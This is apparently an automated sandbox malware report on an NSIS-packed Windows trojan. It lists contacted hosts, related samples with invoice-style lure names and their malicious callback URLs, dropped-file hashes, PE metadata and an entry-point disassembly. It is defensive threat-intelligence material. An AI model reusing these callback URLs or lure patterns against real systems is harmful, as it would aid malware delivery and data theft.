157.245.232.77 | sw-advisers.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true

                                                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 432566
Start date: 10.06.2021
Start time: 14:34:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 22s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: UGGJ4NnzFz (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@12/6
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 31.8% (good quality ratio 29.1%)
• Quality average: 74.8%
• Quality standard deviation: 30.9%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 13.88.21.125, 104.42.151.234, 92.122.145.220, 104.43.139.144, 184.30.20.56, 20.82.210.154, 2.20.142.209, 2.20.142.210, 51.103.5.186, 92.122.213.247, 92.122.213.194, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
--- | --- | --- | ---
62.149.128.40 | RFQ - Upgrade Project (PML) 0000052021.exe | malicious | www.goldinsacks.com/dp3a/?Qxo=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35yXCLpOJnP&MJBD=FdFp3xAhctetbXf0
62.149.128.40 | a3aa510e_by_Libranalysis.exe | malicious | www.pisanosportpraxis.com/ued5/?t8o8ntU=GUK9sjNbD89abTK6FD0fM0HcLYLNxgR27Mwej6WDWVFny8CdmUlNI3bKr8QSth3jMvuv&kRm0q=J48P
62.149.128.40 | 4xMdbgzeJQ.exe | malicious | www.cvacity.info/m2be/?G8oTcJoh=+ymgIVB+JkWP6R7YCSTG+4Qmonnd1NOjLVHuSK9LognEyCSSwr46yM8J3NKVrc9U7VJG&zN9lV=1bj8JTVpMltD8T6P
62.149.128.40 | ZGNbR8E726.exe | malicious | www.cvacity.info/m2be/?GVFTh=+ymgIVB+JkWP6R7YCSTG+4Qmonnd1NOjLVHuSK9LognEyCSSwr46yM8J3NKVrc9U7VJG&tv5P=ilQ8UxJh
62.149.128.40 | Request for Quotation.exe | malicious | www.wellageing.info/9t6k/?wR=QjLkVttwHxdzSORDX02FearTwV75OHDGJuPijYwpTZJNsfBsNREOp0mBVmvQJfZv0p1b&S0Gll=RRHTxr6PgzuH1
62.149.128.40 | bin.exe | malicious | www.premiokapuscinski.com/oncs/?tXUd=B5YGVybFY0FfVyMa/xuDcOPD2UtmSvv3WuoMM449svNwIhQlLpmmoLlg+CGrSypNQb1y&2ddpC=ftxDHdNX
62.149.128.40 | dihOaeEonG.exe | malicious | www.19songs.cloud/gtb/?TVg8yB=zjU8DXLHpJb&1bKHt=Ps7s5PaFgdge7g1jPl1xZLRpeoKW9pI+hZGFTIm5CGqXeAxXw8gxxxDKGCrLxWn3IsBjzKiPVQ==
62.149.128.40 | 49Shipment Notification.exe | malicious | www.my-weddingring.info/hx344/
62.149.128.40 | 75PO9981.exe | malicious | www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==
62.149.128.40 | 79HDS11254.PDF.exe | malicious | www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==&sql=1
62.149.128.40 | 2526713SB.PDF.exe | malicious | www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==&sql=1
160.153.136.3 | 3arZKnr21W.exe | malicious | www.growwithjenn.com/dp3a/?O8OtHJOh=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi&dL08CF=4hu4H0zXnt1lvdbP
160.153.136.3 | Invoice number FV0062022020.exe | malicious | www.champearthmotors.com/grb/?rZ_PWR=AL0hw0R0lbS&4hOh3f=l2ztJkc0WEZnO6tjQOXxeehI3g/9hod//lJ06u38RCkbOtuk1CxF2ydqT5Dtc6mAZmzf
160.153.136.3 | Invoice number FV0062022020.exe | malicious | www.ktgetchell.com/grb/?w2J=fN9xgXixMFkDih1P&nZLdIfTX=shtTMY44CzrNBT4TVLY1BF8/nx0lRGYb/bv0+DeaWlZWWhA6gADx6inooxeGNzfxNVoV
160.153.136.3 | RFQ K1062 PROJECT.exe | malicious | www.growwithjenn.com/dp3a/?i890b4=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5apw7c3IYhJgl&9rMTYd=oPnT
160.153.136.3 | PROFORMA INVOICE PDF.exe | malicious | www.radansaisortagim.com/owws/?UL=-ZlpiB&2dN4wD=MWTlbswL4P3Sg3DoltjxNdlNy+An/ckQozpozVA/KXxmjb6b3UjhpLPBjyIpyyaGjruozMClkQ==
160.153.136.3 | Revised_Order PDF.exe | malicious | www.radansaisortagim.com/owws/?Tf3=MWTlbswL4P3Sg3DoltjxNdlNy+An/ckQozpozVA/KXxmjb6b3UjhpLPBjxk5uDG9keH5&7nGp=i4El9bcX
160.153.136.3 | Payment_Advice.exe | malicious | www.shivalikspiritualproducts.com/q4kr/?w2MLb=6lux&QtRl=JM7XHLd6JIZomSwbIKh/7iBr49GWoi75tn6r4nQqx6ZeCkVItn9FqPXZu+Qs8bxZGW12
160.153.136.3 | Items and Specification Needed for RFQ546092227865431209PDF.exe | malicious | www.qfpclothing.com/ib82/?KXeX=GVNL6hyh3zpxw&jR=KhYG6rC7727xgDFb7WzvOTHmqWh2eYhtkwxt34gVIx1EuNOm22DTsJ3z+g9C8mXQ9PHT
160.153.136.3 | STATEMENT OF ACCOUNT.exe | malicious | www.kmeltonbeauty.com/3edq/?wX=Irpq6xX1eV14eXESY49R8tV/qgMqmFwNB65EjppLgmg6KjCBrtuzfWySUxcKuLKJm99p&A0Gh=QBkpkdy86r
160.153.136.3 | Ack0527073465.exe | malicious | www.pakelloswimwear.com/5yue/?3fJx=1MQRS7WNCSh3ldaNqFs4eCJGmvueVQRfblZEVMI3dZ/DIEpy1toECUQ7e7eF6mTxOyaW&2dC4V=P48T-VYXSzrLax
160.153.136.3 | item.exe | malicious | www.northtlc.com/m3rc/?s864=nrKTeKZE0MKRctV+tdCe7tH49jiRWtcoL+pYt/4T2TK5ImATI1hTaadRMIG2OTwDbmYk&Ntipth=llyx
160.153.136.3 | RFQ - Upgrade Project (PML) 0000052021.exe | malicious | www.growwithjenn.com/dp3a/?Qxo=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQBMmog7uBi&MJBD=FdFp3xAhctetbXf0
160.153.136.3 | Payment Advice-Pdf.exe | malicious | www.ameliewong.com/5yue/?DVl=cvmL&V6=Nuidjmu34zZgQGUwRWgLjMkpp0iaFgZ10IuE+aaPCvF0mk6r8qIsODEr0g1HErnO8Euw
160.153.136.3 | PO_0065-2021.exe | malicious | www.northtlc.com/m3rc/?JhJ=nrKTeKZE0MKRctV+tdCe7tH49jiRWtcoL+pYt/4T2TK5ImATI1hTaadRMLqMNSc4YR513hnjbQ==&qR=J4i8zf50NBY44rGp
160.153.136.3 | l4M4vBmzSCgDmGC.exe | malicious | www.alfenafootwear.com/66op/?Cxo0=ctGTotGx&pZRxnjD=1IjlgHsu4nmTspcAscJq6B9ChB/RinhJ8EPNuHHkIIXoqzkSIUbMD/hNb1QsnQqC6qxc
160.153.136.3 | PI1942100023.exe | malicious | www.kmeltonbeauty.com/3edq/?IRrDPny=Irpq6xX1eV14eXESY49R8tV/qgMqmFwNB65EjppLgmg6KjCBrtuzfWySUxcgx76Ji/1p&Bl=lHLLrt6PJPF
160.153.136.3 | Inv3063200.exe | malicious | www.pharma-vie.com/vfm2/?k2MdtP=LQgpqqUUD6tFYXGR2/mF5jabv4guhNbmYJlcSe5R95BY6NRPD5v3bo31AxyBkgVBxzRE&NZitYp=zL3h2V_pyz
160.153.136.3 | Produktkatalog2021_pdf.exe | malicious | www.successclickmg.com/nu8e/?Rd8xg2=oyYKGSFYjAEVgv6eM1XFsxyoJdZlCypBLH2eqexNhJV07wFNRboEuXo5qh1rT/X7vJI6&ExoLn6=2dmL
160.153.136.3 | New Order_PO 1164_HD-F 4020 6K.exe | malicious | www.cosmicalerts.com/un8c/?FbXpspL=eTH1tzrzqkqSuOvqvhHj+PzhTkzTDFFQy2F5MQjG6S/yeeyrs282kqlecVgWoEx6WA+v&EZXtxn=tXEPRnYpiZ_H
160.153.136.3 | Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exe | malicious | www.jennifermarieinteriors.com/qd8i/?Qp=rxD0eyQYawjOPT69ZPEsc5Zpd9R/L+6Ma3KQ/ZI/SH6HxpK7FRWwFkq2nSlbCjzW9hcK&xPWH_=LVz4vpXpDf7DLZ

                                                                      Domains

Match | Associated Sample Name / URL | Detection | Context
--- | --- | --- | ---
www.goldinsacks.com | RFQ - Upgrade Project (PML) 0000052021.exe | malicious | 62.149.128.40
shops.myshopify.com | triage_dropped_file.exe | malicious | 23.227.38.74
shops.myshopify.com | triage_dropped_file.exe | malicious | 23.227.38.74
shops.myshopify.com | New Order Vung Ang TPP Viet Nam.exe | malicious | 23.227.38.74
shops.myshopify.com | RFQ K1062 PROJECT.exe | malicious | 23.227.38.74
shops.myshopify.com | qXDtb88hht.exe | malicious | 23.227.38.74
shops.myshopify.com | RFQ.exe | malicious | 23.227.38.74
shops.myshopify.com | Purchase Order.exe | malicious | 23.227.38.74
shops.myshopify.com | Telex_Payment.exe | malicious | 23.227.38.74
shops.myshopify.com | QyKNw7NioL.exe | malicious | 23.227.38.74
shops.myshopify.com | IsIMH5zplo.exe | malicious | 23.227.38.74
shops.myshopify.com | ORDER0429.exe | malicious | 23.227.38.74
shops.myshopify.com | Remittance advice.exe | malicious | 23.227.38.74
shops.myshopify.com | HQvI0y1Wu4.exe | malicious | 23.227.38.74
shops.myshopify.com | 003 SOA.exe | malicious | 23.227.38.74
shops.myshopify.com | DOC1073.exe | malicious | 23.227.38.74
shops.myshopify.com | SKMBT_C22421033008180 png.exe | malicious | 23.227.38.74
shops.myshopify.com | swift.exe | malicious | 23.227.38.74
shops.myshopify.com | CONTRACT SWIFT.exe | malicious | 23.227.38.74
shops.myshopify.com | PO 4500151298.exe | malicious | 23.227.38.74
shops.myshopify.com | Bidding of BMP Project EMMP.99876786.exe | malicious | 23.227.38.74

                                                                      ASN

Match | Associated Sample Name / URL | Detection | Context
--- | --- | --- | ---
DIGITALOCEAN-ASNUS | Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious | 138.197.103.178
DIGITALOCEAN-ASNUS | 46113.dll | malicious | 157.245.231.228
DIGITALOCEAN-ASNUS | 46113.dll | malicious | 157.245.231.228
DIGITALOCEAN-ASNUS | Payment Copy.exe | malicious | 68.183.229.215
DIGITALOCEAN-ASNUS | teX5sUCWAg.exe | malicious | 161.35.179.108
DIGITALOCEAN-ASNUS | 16X4iz8fTb.exe | malicious | 139.59.176.201
DIGITALOCEAN-ASNUS | teX5sUCWAg.exe | malicious | 161.35.179.108
DIGITALOCEAN-ASNUS | P M.exe | malicious | 138.68.75.3
DIGITALOCEAN-ASNUS | Invoice number FV0062022020.exe | malicious | 68.183.21.244
DIGITALOCEAN-ASNUS | 03062021.exe | malicious | 159.89.241.246
DIGITALOCEAN-ASNUS | 85OpNw6eXm.exe | malicious | 46.101.214.246
DIGITALOCEAN-ASNUS | JJ1PbTh0SP.dll | malicious | 174.138.22.216
DIGITALOCEAN-ASNUS | rHk5KU7bfT.exe | malicious | 64.227.90.87
DIGITALOCEAN-ASNUS | gkeAUexwql.exe | malicious | 206.189.227.255
DIGITALOCEAN-ASNUS | Sbb4QCilrT.exe | malicious | 139.59.176.201
DIGITALOCEAN-ASNUS | SPARE PARTS.doc | malicious | 206.81.31.203
DIGITALOCEAN-ASNUS | Quotation.doc | malicious | 206.81.31.203
DIGITALOCEAN-ASNUS | Payment Advice.exe | malicious | 159.89.241.246
DIGITALOCEAN-ASNUS | lQsa52UcOF.xlsb | malicious | 159.203.18.194
DIGITALOCEAN-ASNUS | transferred.exe | malicious | 64.227.90.87
GODADDY-AMSDE | 3arZKnr21W.exe | malicious | 160.153.136.3
GODADDY-AMSDE | Invoice number FV0062022020.exe | malicious | 160.153.136.3
GODADDY-AMSDE | Invoice number FV0062022020.exe | malicious | 160.153.136.3
                                                                      RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                      • 160.153.137.40
                                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                                      • 160.153.137.40
                                                                      Quietanza_rif392.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Quietanza_rif392.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • 160.153.245.113
                                                                      Bonus_Ditta2302.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Bonus_Ditta2302.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Revised_Order PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                      • 160.153.138.71
                                                                      wire_confirmation.pdf.exeGet hashmaliciousBrowse
                                                                      • 160.153.246.73
                                                                      Inv 272590.docGet hashmaliciousBrowse
                                                                      • 160.153.133.162
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Ack0527073465.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      ARUBA-ASNITcy.exeGet hashmaliciousBrowse
                                                                      • 89.46.110.6
                                                                      RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      pKTxIEQs6I.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      3z2eOYszJw.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      ccOtGqqBJB.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      Bco0MUkxd3.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      ICNdIx3GY1.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      SecuriteInfo.com.Mal.GandCrypt-B.921.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      QEQq6lmEpj.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      cy.exeGet hashmaliciousBrowse
                                                                      • 89.46.110.6
                                                                      IMAGE20210427001922654.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.45
                                                                      New_Order.exeGet hashmaliciousBrowse
                                                                      • 62.149.189.71
                                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                      • 62.149.142.170
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      8D7A2AE1A479BBCA9229723C2308C564B7477791E047D.exeGet hashmaliciousBrowse
                                                                      • 188.213.167.248
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Match: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll
Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious
3arZKnr21W.exe | malicious
Shipping receipt.exe | malicious
New Order TL273723734533.pdf.exe | malicious
YZ8OvkljWm.exe | malicious
U03c2doc.exe | malicious
QUOTE061021.exe | malicious
PAYMENT CONFIRMATION.exe | malicious
PO187439.exe | malicious
090009000000090.exe | malicious
NEWORDERLIST.exe | malicious
00404000004.exe | malicious
40900900090000.exe | malicious
INVO090090202.exe | malicious
SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe | malicious
D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe | malicious
D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe | malicious
SecuriteInfo.com.Variant.Bulz.383129.23206.exe | malicious
SecuriteInfo.com.Variant.Bulz.383129.29566.exe | malicious
ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
Process: C:\Users\user\Desktop\UGGJ4NnzFz.exe
File Type: data
Category: dropped
Size (bytes): 164352
Entropy (8bit): 7.998758173527995
Encrypted: true
SSDEEP: 3072:QT5c8TmXd3cHrOEnBjJYnX/3VOe6PbETLuf3wKW/Hic0bFaj24k9p1C:QT4tcHrnjJGvFOpoT4W/fVip8
MD5: B0D1F8FE2661BB67EAE722EF05BB2EA6
SHA1: 63478D37EF57D85F0CC92FCBBB3680EEC90FB384
SHA-256: 02ECBE9DFAACA44A385946BF2A10AB675CD3AC64E66811D1333A9EBCBB728A4F
SHA-512: 318172A5D104A9C782D1CCC81F09A67241E85E2EF9E8B2F76661E977DC61B85E373593B4CC3F2BFFC963CC5D98C44BA399197F1E40391FB4513AD718884C2683
Malicious: false
Reputation: low
Preview: ./f.t.L.['.3...._2.q.".4.H.#..Nn..J...^Z.wn..f..&...w-..NH`.S.Q.?.v..o...40........o.c...oxy.Z#.(XD.....H8..4.!f...,.B..ok..g..Fq.z..n..)ap.e......7.d.8<.....IB.{...Hkq~..a.\..8.h9.. .4c....+K..$.....M....k..}V.z.8.;..b..P.6....M.....4.Lu.Ifx.e.=wV...q.=i...g..)~W.ca.-..........23.....B.......m..!h.......y...r.@........9G.;m.p<......Yy.j._...W...[.S./.......TU.4....L.}._%j..eW.h...u/-..GT..}.Q..W.h...=4.s..x..j..zU....*...........,s&..<V>...(.`Xx..x....-3..o.\.Z|M/.Q+,.~........4.........(hY.O;...p.F...~...).L.....'M.g.@..b...u........{....s.....I......QX..[...i..x..f.J.......$.?*.q.-e*..U.y......f..h..2'....1...dJT.._.a...K.c...{.@......id..b..p;..~...........lZ7E..K.e...q...S.....?[......o...9NSx,../..\...B...n.B....T..4...-.......I..L&-.^...........l9...L....fj.G..V........8..<C.L.X....+J..L2...A..@D...`?........)...o..f`...~4.`...T.zH..Y...z]..}=..P..t.[.:.:m.6..r.D...4.8.......6.X.a......+.]..pc@.1..q.<.g..K._..L...rF...

C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
Process: C:\Users\user\Desktop\UGGJ4NnzFz.exe
File Type: data
Category: dropped
Size (bytes): 56977
Entropy (8bit): 4.980974364016973
Encrypted: false
SSDEEP: 1536:kpYDj6sp0NqCBljcLGbeeqr8uXKZnH/E/pl7f3tsfLvE:ScfOQLGbzqb6ZfEP3F
MD5: EA1030174F35B4071E9655765BDEE0A7
SHA1: E1DA533CAD9DD79A6CA5567840631492B546FAF1
SHA-256: EA9A33E85D080A56D1242F112240E1396C45149913A7CBFED0132E0BA171561A
SHA-512: 2DE92DBD68B66527981E28ACCCA0C01676C35A5CCF951A0B429799DBE1BBDEFF86931D3E211891D2EC1A44D19132D45E10ADEC6A56D122BABFFDBF64C540A909
Malicious: false
Reputation: low
Preview: U.......S........b...........%....... .....!.....".....#...a.$...v.%...3.&.....'.....(.....).....*...a.+.....,...a.-.........../.....0.....1.....2.....3...Q.4.....5...4.6.....7...=.8...%.9.....:.....;.....<.....=.....>...A.?.....@.....A...5.B.....C.....D...=.E.....F...I.G.....H.....I.....J...5.K...W.L.....M.....N.....O.....P...5.Q.....R.....S.....T...5.U.....V.....W...=.X.....Y.....Z.....[...=.\.....].....^...4._.....`...U.a.....b.....c.....d.....e.....f...~.g.....h.....i.....j.....k.....l.....m...Y.n.....o.....p...U.q.....r...I.s.....t.....u.....v...Y.w...W.x.....y.....z.....{.....|...Y.}.....~...............Y.................U.......................U.................4...............................................~.....y.................................................................I.............................W..............................

C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
Process: C:\Users\user\Desktop\UGGJ4NnzFz.exe
File Type: data
Category: dropped
Size (bytes): 254631
Entropy (8bit): 7.4186917232920075
Encrypted: false
SSDEEP: 6144:6GpT4tcHrnjJGvFOpoT4W/fVipc4dL9bRP4t:b4tcLjJG9OpoT4W/fViDdpb58
MD5: 6805AECB719838AC09004E2E0655BDED
SHA1: 5D1F4A1429C20E9105F1800B13E558022FD15294
SHA-256: A764168E4B558D726EF4AAC92AF20367FB229F7B42AECE6EAB191B4208B5E61B
SHA-512: 4784DB4AA246735148204058EF8F0108E1FB3D49BFDF76CCC15A56E2251E43F54FECFA53C7338F15E9DAF5EA16F53A3A79A5A01DDE95403E395C5F95062D952F
Malicious: false
Reputation: low
Preview: .T......,.......................T=...... S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll
Process: C:\Users\user\Desktop\UGGJ4NnzFz.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.855045165595541
Encrypted: false
SSDEEP: 192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5: FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1: 30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256: 6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512: F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: 3arZKnr21W.exe, Detection: malicious
• Filename: Shipping receipt.exe, Detection: malicious
• Filename: New Order TL273723734533.pdf.exe, Detection: malicious
• Filename: YZ8OvkljWm.exe, Detection: malicious
• Filename: U03c2doc.exe, Detection: malicious
• Filename: QUOTE061021.exe, Detection: malicious
• Filename: PAYMENT CONFIRMATION.exe, Detection: malicious
• Filename: PO187439.exe, Detection: malicious
• Filename: 090009000000090.exe, Detection: malicious
• Filename: NEWORDERLIST.exe, Detection: malicious
• Filename: 00404000004.exe, Detection: malicious
• Filename: 40900900090000.exe, Detection: malicious
• Filename: INVO090090202.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious
• Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious
• Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious
• Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious
• Filename: SecuriteInfo.com.Variant.Bulz.383129.29566.exe, Detection: malicious
• Filename: ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.912934279663738
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: UGGJ4NnzFz.exe
File size: 223620
MD5: b148ae414eb8a1b34a15cdb32c21f9ee
SHA1: 25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256: 193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
SHA512: 9f6efbfdd1ab7bed6e0efcff882fd05816c0cbb6b413abce562f1ab6c8adbfa2d86610299be8d399ba36a305b64cadc762806eaa4c647d9b04fd457ec1537d0a
SSDEEP: 6144:Ds9G4RsUIfpwRmZfqJxbx3jjTQeGYWAaE:yG45IfpTIxV3jHQeGYn
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40323c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F1588A77B6Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F1588A77821h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F1588A7780Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F1588A74F6Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
